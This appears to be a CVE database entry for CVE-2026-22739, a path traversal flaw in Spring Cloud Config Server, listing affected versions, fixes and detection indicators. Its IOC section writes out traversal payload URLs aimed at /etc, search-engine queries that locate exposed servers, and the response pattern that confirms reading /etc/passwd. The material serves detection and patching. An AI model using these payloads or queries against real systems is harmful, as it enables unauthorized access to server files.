cbcvebase.
CVE-2026-22739
published 2026-03-24

CVE-2026-22739: Vulnerability in Spring Cloud when substituting the profile parameter from a request made to the Spring Cloud Config Server configured to the native file…

PriorityP265high8.6CVSS 3.1
AVNACLPRNUINSUCHILAL
EXPLOIT
EPSS
1.22%
64.9th percentile
Vulnerability in Spring Cloud when substituting the profile parameter from a request made to the Spring Cloud Config Server configured to the native file system as a backend, because it was possible to access files outside of the configured search directories.This issue affects Spring Cloud: from 3.1.X before 3.1.13, from 4.1.X before 4.1.9, from 4.2.X before 4.2.3, from 4.3.X before 4.3.2, from 5.0.X before 5.0.2.

Affected

5 ranges
VendorProductVersion rangeFixed in
springspring_cloud>= 3.1.x < 3.1.133.1.13
springspring_cloud>= 4.1.x < 4.1.94.1.9
springspring_cloud>= 4.2.x < 4.2.34.2.3
springspring_cloud>= 4.3.x < 4.3.24.3.2
springspring_cloud>= 5.0.x < 5.0.25.0.2

Detection & IOCsextracted from sources · hover to see the quote

url{{BaseURL}}/application/..%2F..%2F..%2F..%2F..%2Fetc
url{{BaseURL}}/application/..%2F..%2F..%2F..%2F..%2Fetc/main
url{{BaseURL}}/application/..%252F..%252F..%252F..%252F..%252Fetc
url{{BaseURL}}/application/default%2C..%2F..%2F..%2F..%2F..%2Fetc
othershodan-query: http.html:"propertySources"
otherfofa-query: body="propertySources" && body="profiles" && body="label"
  • Probe for Spring Cloud Config Server exposure by checking for 'propertySources', '"profiles"', and '"label"' all present in the response body of GET /application/default
  • Path traversal payloads use URL-encoded and double-URL-encoded dot-dot-slash sequences in the profile parameter (e.g. ..%2F, ..%252F) and comma-separated profile injection (default%2C..%2F...) targeting /etc on the server
  • Successful exploitation is confirmed when the HTTP response body contains Unix /etc/passwd-style content matching 'root:.*:0:0' or '"root":"x:0:0:' with HTTP 200 and Content-Type application/json
  • The vulnerability is in the profile parameter substitution path of Spring Cloud Config Server when using the native file system backend (CWE-22 path traversal)
  • Affected Maven artifact is org.springframework.cloud:spring-cloud-config-server; scan for this dependency in Java application manifests
  • ·Vulnerability only affects Spring Cloud Config Server instances configured to use the native file system as a backend; non-native backends (e.g. Git) are not affected
  • ·Exploit requires a crafted HTTP request; unauthenticated remote exploitation is possible (CVSS AV:N/AC:L/PR:N/UI:N)
  • ·The Nuclei template uses a two-step flow: step 1 confirms the target is a Spring Cloud Config Server, step 2 fires traversal payloads — false positives are reduced but not eliminated
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.